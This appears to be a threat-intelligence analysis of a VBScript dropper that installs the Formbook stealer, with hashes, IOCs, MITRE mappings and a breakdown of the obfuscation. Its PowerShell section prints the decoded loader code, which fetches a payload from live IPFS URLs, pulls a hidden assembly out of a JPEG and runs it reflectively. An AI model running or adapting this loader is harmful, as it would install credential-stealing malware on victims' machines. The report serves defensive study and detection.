Formbook Goes Decentralized: A 38,000-Line VBScript Dropper Hiding Payloads on IPFS

This sample is a heavily obfuscated VBScript dropper that initiates a multi-stage infection chain culminating in the deployment of the Formbook information stealer. The script employs dual-layer obfuscation using token substitution across 38,877 lines -- the first ~19,400 of which are pure junk code designed to bloat the file and exhaust analysis tools. The functional payload occupies the final ~40 lines. Upon execution, the dropper decodes a hex-encoded PowerShell command, then launches it silently via Windows Management Instrumentation (WMI) to evade detection. The PowerShell stage downloads a fake JPEG file from the InterPlanetary File System (IPFS) pinning service gateway.lighthouse.storage, extracts a Base64-reversed .NET assembly hidden between steganographic markers, and executes the Fiber.Program.Main method. This loader then downloads and process-injects the final Formbook payload (also hosted on IPFS). Use of IPFS for payload hosting is a deliberate evasion technique: content is immutable, decentralized, and difficult to take down. Known lure filenames include KIZAD_WSP-2025-PRO.vbs, suggesting potential targeting of logistics or commercial entities in the UAE/Gulf region.

Sample Metadata

Field	Value
SHA256	95f69328694f351bb21526bc7970646af26380f2be3a1008ce58311c12d11f54
MD5	d107b3bf4609b4c1bc3ecc06d518d2df
SHA1	67b8d5dea53db8c174c1c17c7b06da59770e179e
File Type	ASCII text / VBScript (CRLF line terminators)
File Size	1,613,520 bytes (1.54 MB)
Line Count	38,877 lines
VT Detections	17 / 76 (as of 2026-03-12)
First Seen	2026-03-11 08:14:06 UTC
Last Seen	2026-03-12 16:21:34 UTC
Threat Label	trojan.gqyk/sagent (VirusTotal consensus)
Reported By	abuse.ch
Known Filenames	KIZAD_WSP-2025-PRO.vbs, ahppysnewfud.vbs, Name_File.vbs

Stage 2 -- .NET Loader (extracted from IPFS JPEG)

Field	Value
SHA256	9fe957e5be9729b4fe64906b95a6ff2931d42ff2805ad12069b99e3fdc8b6ae3
MD5	b8d6dd51523250152b0dbab27e53fcc8
File Type	PE32 DLL -- Mono/.NET assembly
File Size	1,323,520 bytes
VT Detections	44 / 76
AV Name	Gen:Variant.Cerbu.270977 / MSIL/Kryptik.APCM / Trojan.InjectNET.14

Static Analysis Findings

VBScript Obfuscation (Stage 1)

The VBS file uses two layers of token-based string obfuscation:

1. Junk inflation: Lines 1--19,418 consist entirely of the statement nonrewarding = nonrewarding & "chevice", building a never-used string. This pads the file to ~1.5 MB to slow or crash AV scanners and analysts.

2. Dual-token hex encoding: The hex-encoded PowerShell payload is stored in variable echoey. Each hex character is separated by the token caram, and additional chevice tokens are sprinkled throughout. Decoding is:

   subcookie = Replace(Replace(CStr(echoey), "chevice", ""), "caram", "")
   

   After removing both tokens, a raw hexadecimal string remains.

3. String fragmentation: API names are further obfuscated by splitting across concatenated chevice-containing substrings:

   • winmgmts:root\cimv2 becomes wcheviceichevicenchevicemcheviceg...
   • Win32_ProcessStartup, Win32_Process

PowerShell Payload (decoded from hex)

$mazamorra = 'https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe'
$preopinion = New-Object ("Net.Web"+"Client")
$yarmulkes = $preopinion.("Download"+"Data").Invoke($mazamorra)
$glossed = [Text.Encoding]::UTF8.GetString($yarmulkes)
$spiromonas = 'IN-'
$wholth = '-in1'
$winkie = $glossed.IndexOf($spiromonas)
$magistracy = $glossed.LastIndexOf($wholth)
# ... extract between IN- and -in1 markers, reverse, replace # with A, Base64 decode
$archespore = [Convert]::("FromBase6"+"4String").Invoke($nolpe)  # .NET assembly bytes
$proplyd = [AppDomain]::CurrentDomain.("Lo"+"ad").Invoke($archespore)
$conessi = @(
  'https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq',
  '0','C:\Users\Public\Downloads\','Name_File','wscript','1','wscript','0',
  'URL','C:\Users\Public\Downloads\','Name_File','vbs','1','1','Task_Name','0','','',''
)
$floodlighting = $proplyd.GetType('Fiber.Pro'+'gram')
$dangerfully = $floodlighting.GetMethod('Ma'+'in')
$dangerfully.Invoke($null, [object[]]$conessi)

Key observations:

• The URL string is built with character concatenation to evade static string matching.
• .NET reflection API calls (GetType, GetMethod, Invoke) are split with string concatenation.
• The Fiber.Program.Main method receives a configuration array including the C2 IPFS URL, drop paths, host process name (wscript), task name (Task_Name), and persistence flags.

Stage 2 JPEG Steganography

The IPFS JPEG (bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe) is a valid 3,155,453-byte JPEG with an HP ICC colour profile. The .NET assembly is hidden within the JPEG data stream:

• Start marker: IN- at byte offset 1,390,750
• End marker: -in1 at byte offset 3,155,449
• Encoding: Base64, reversed, with # replacing A characters
• Extracted assembly: 1,323,520 bytes, PE32 DLL (Mono/.NET)

Stage 2 .NET Loader (Fiber.Program)

The Fiber.Program .NET assembly (detected as Gen:Variant.Cerbu.270977) performs:

• Process injection: imports VirtualAllocEx, WriteProcessMemory, CreateProcess from kernel32.dll
• Task Scheduler persistence: embeds Microsoft.Win32.TaskScheduler.dll (legitimate library from github.com/dahall/taskscheduler) to create a scheduled task named Task_Name
• AES encryption: references AesCryptoServiceProvider (likely for C2 traffic or payload decryption)
• Target process: injects into wscript.exe
• Final payload: downloads from second IPFS URL (bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq, 2.5MB JPEG)

Entropy and Sections

• VBS source: low entropy (~3.5 bits/byte) due to repetitive junk text
• Stage 2 .NET DLL: PE32, 3 sections, moderate entropy indicating packed/encrypted embedded resources

Behavioral Analysis

Based on static analysis and known Formbook TTP patterns, the expected runtime behavior is:

1. Execution: User double-clicks .vbs file; wscript.exe executes the dropper.
2. Self-copy: Script copies itself to C:\Users\Public\Downloads\Name_File.vbs.
3. WMI launch: Uses winmgmts:root\cimv2 Win32_Process.Create to spawn powershell.exe with -NoProfile -WindowStyle Hidden flags.
4. IPFS download: PowerShell downloads 3.1MB JPEG from Lighthouse IPFS gateway.
5. Assembly loading: Extracts, decodes, reverses, and reflectively loads the .NET assembly into the current PowerShell process.
6. Task persistence: Fiber.Program creates a Windows Scheduled Task (Task_Name) pointing to C:\Users\Public\Downloads\Name_File.vbs or the wscript launcher.
7. Process injection: Spawns wscript.exe as a host process, allocates memory, and writes the Formbook payload.
8. Formbook execution: Formbook activates its form-grabbing, keylogging, screenshot, credential theft, and browser cookie-stealing modules.

Network Indicators

Indicator	Type	Role
gateway.lighthouse.storage	Domain	IPFS gateway used for all payload hosting
https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe	URL	Stage 2: .NET loader disguised as JPEG (3.1MB)
https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq	URL	Stage 3: Formbook payload disguised as JPEG (2.5MB)
bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe	IPFS CID	Stage 2 loader CID
bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq	IPFS CID	Formbook payload CID

Both IPFS resources were confirmed live as of 2026-03-12, hosted on Lighthouse.storage's Cloudfront-backed IPFS gateway. IPFS content-addressing ensures payloads cannot be removed by domain takedown.

MITRE ATT&CK TTPs

Technique ID	Name	Notes
T1059.005	Command and Scripting Interpreter: VBScript	Initial dropper execution
T1059.001	Command and Scripting Interpreter: PowerShell	Stage 2 execution via WMI
T1047	Windows Management Instrumentation	WMI used to spawn PowerShell hidden
T1027	Obfuscated Files or Information	Dual-token hex obfuscation + file inflation
T1027.002	Software Packing	Stage 2 assembly embedded in JPEG
T1027.010	Command Obfuscation	String concatenation to evade string detection
T1564.001	Hide Artifacts: Hidden Window	powershell.exe -WindowStyle Hidden
T1105	Ingress Tool Transfer	Payload fetched from IPFS at runtime
T1583.006	Acquire Infrastructure: Web Services	IPFS used for resilient payload hosting
T1036.005	Masquerading: Match Legitimate Name or Location	.NET DLL named Microsoft.Win32.TaskScheduler.dll
T1055	Process Injection	VirtualAllocEx + WriteProcessMemory into wscript.exe
T1055.002	Portable Executable Injection	PE injected into host process
T1053.005	Scheduled Task/Job: Scheduled Task	Task named Task_Name for persistence
T1547.001	Boot or Logon Autostart Execution	Scheduled task triggers on logon
T1074.001	Data Staged: Local Data Staging	Drops copy to C:\Users\Public\Downloads\
T1113	Screen Capture	Formbook capability
T1056.001	Input Capture: Keylogging	Formbook capability
T1539	Steal Web Session Cookie	Formbook browser cookie theft
T1555.003	Credentials from Password Stores: Credentials from Web Browsers	Formbook browser credential theft
T1041	Exfiltration Over C2 Channel	Formbook C2 exfiltration

IOCs

File Indicators

Type	Value	Description
SHA256	95f69328694f351bb21526bc7970646af26380f2be3a1008ce58311c12d11f54	VBS dropper
MD5	d107b3bf4609b4c1bc3ecc06d518d2df	VBS dropper
SHA1	67b8d5dea53db8c174c1c17c7b06da59770e179e	VBS dropper
SHA256	9fe957e5be9729b4fe64906b95a6ff2931d42ff2805ad12069b99e3fdc8b6ae3	Stage 2 .NET loader
MD5	b8d6dd51523250152b0dbab27e53fcc8	Stage 2 .NET loader
Filename	KIZAD_WSP-2025-PRO.vbs	Lure filename
Filename	ahppysnewfud.vbs	Alternate dropper name
Filename	Name_File.vbs	Dropped copy path
Path	C:\Users\Public\Downloads\Name_File.vbs	Persistence file drop

Network Indicators

Type	Value	Description
Domain	gateway.lighthouse.storage	IPFS gateway for all payloads
URL	https://gateway.lighthouse.storage/ipfs/bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe	Stage 2 loader URL
URL	https://gateway.lighthouse.storage/ipfs/bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq	Formbook payload URL
IPFS CID	bafybeienmgwcoj64jx2t5nmlik2wba3xsil6bmjzqkszqpwyadgvl64mxe	Stage 2 loader CID
IPFS CID	bafybeigl7leimjh6izjxqapmyjzuobigsz6l7y2lvfcyrnyw5nl254m6aq	Formbook payload CID

Artifact/Behavioral Indicators

Type	Value	Description
Scheduled Task	Task_Name	Persistence task created by loader
Process	wscript.exe	Host process for Formbook injection
WMI Query	winmgmts:root\cimv2 via Win32_Process.Create	Execution via WMI
Registry Key	(standard Formbook HKCU run key pattern)	Possible secondary persistence
.NET Class	Fiber.Program	Loader class name
.NET Method	Fiber.Program.Main	Loader entry point
Steganography	Markers IN- / -in1 in JPEG	Hidden payload markers

Campaign Context and Attribution

Formbook (also known as XLoader on macOS) is a commodity information stealer-as-a-service (MaaS) sold on underground forums since ~2016. This campaign introduces several noteworthy delivery innovations.

The filename KIZAD_WSP-2025-PRO.vbs references "KIZAD" (Khalifa Industrial Zone Abu Dhabi) and "WSP" (possibly a construction/engineering firm), suggesting targeting of logistics, manufacturing, or construction sector targets in the UAE/Middle East. The dropper was likely delivered via email phishing -- the VBS dropper pattern (self-copying + WMI execution) is consistent with known Formbook MaaS distribution kits observed in 2025-2026.

The use of gateway.lighthouse.storage as a payload delivery mechanism is a growing trend among commodity malware actors seeking censorship-resistant hosting. Multiple Formbook campaigns have adopted IPFS gateways since mid-2024, and this approach makes traditional domain-based takedowns ineffective. IPFS content is addressed by hash, not location -- as long as any node on the network pins the content, it remains available through any gateway.

Attribution to a specific threat actor requires additional campaign correlation. The KIZAD lure may indicate a Middle East-focused operator, but Formbook's widespread availability as a crimeware kit means the barrier to entry is low.